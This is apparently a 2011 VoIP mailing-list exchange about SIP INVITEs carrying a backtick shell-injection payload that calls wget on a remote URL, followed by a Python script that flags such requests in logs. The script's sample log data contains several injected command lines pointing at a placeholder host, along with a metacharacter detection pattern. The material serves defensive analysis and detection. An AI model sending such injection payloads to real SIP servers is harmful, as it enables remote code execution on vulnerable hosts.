On 09/11/2011 07:35 PM, Tom Browning wrote:
I disagree with the 'review CDR' angle for a number of reasons:

a) there is a backtick in the URI trying to force shell and the proper
wget command line to send results to /dev/null
b) the V.php (at the url) appears to do nothing at all and might just
be empty (for log scraping), url safety checks confirm
c) the invites were sprayed across my entire IP address range

To me, this is more like a scan for any SIP host that has shell
injection vulnerability.  The list of vulnerable hosts is just a log
scrape away at the server 91.223.89.94

On second thought, your interpretation does make much more sense.  :-)


--
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/
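
The pattern described in the quoted message (shell metacharacters in the request URI, with the same INVITE sprayed across an address range) can be looked for in SIP request logs. The following Python sketch is an added example, not part of the original thread; the one-line log format, the addresses and the URL are constructed for illustration.

```python
import re
from collections import defaultdict

# Backtick, pipe and angle brackets are not legal unescaped in a SIP URI
# (RFC 3261); "$(" is legal there but is command substitution to a shell.
SHELL_META = re.compile(r"[`|<>]|\$\(")

# Assumed log format: "<source> <destination> <SIP request line>".
# The URI may contain spaces, so match greedily up to the trailing version.
REQ = re.compile(
    r"^(?P<src>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) (?P<uri>sips?:.*) SIP/2\.0$"
)

# Constructed sample input: documentation address ranges, placeholder URL.
SAMPLE = """\
198.51.100.7 192.0.2.10 INVITE sip:`wget -O /dev/null http://example.invalid/V.php`@192.0.2.10 SIP/2.0
198.51.100.7 192.0.2.11 INVITE sip:`wget -O /dev/null http://example.invalid/V.php`@192.0.2.11 SIP/2.0
198.51.100.7 192.0.2.12 INVITE sip:`wget -O /dev/null http://example.invalid/V.php`@192.0.2.12 SIP/2.0
203.0.113.5 192.0.2.10 INVITE sip:1001@192.0.2.10;transport=udp SIP/2.0
203.0.113.5 192.0.2.10 REGISTER sip:192.0.2.10 SIP/2.0
203.0.113.9 192.0.2.11 INVITE sip:`wget -O /dev/null http://example.invalid/V.php`@192.0.2.11 SIP/2.0
"""


def suspicious_invites(lines):
    """Yield (src, dst, uri) for INVITEs whose URI carries shell metacharacters."""
    for line in lines:
        m = REQ.match(line.strip())
        if m and m["method"] == "INVITE" and SHELL_META.search(m["uri"]):
            yield m["src"], m["dst"], m["uri"]


def sweep_sources(lines, min_targets=3):
    """Map each source to its targets when it hit at least min_targets hosts."""
    targets = defaultdict(set)
    for src, dst, _uri in suspicious_invites(lines):
        targets[src].add(dst)
    return {s: sorted(d) for s, d in targets.items() if len(d) >= min_targets}


if __name__ == "__main__":
    lines = SAMPLE.splitlines()
    for src, dst, uri in suspicious_invites(lines):
        print(f"suspicious INVITE {src} -> {dst}: {uri}")
    for src, dsts in sweep_sources(lines).items():
        print(f"sweep from {src} across {len(dsts)} hosts: {', '.join(dsts)}")
```

A source that appears in `sweep_sources` is behaving like a scanner rather than a misdialling caller; a single flagged INVITE still deserves a look at whatever dialplan or script passes the URI to a shell.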
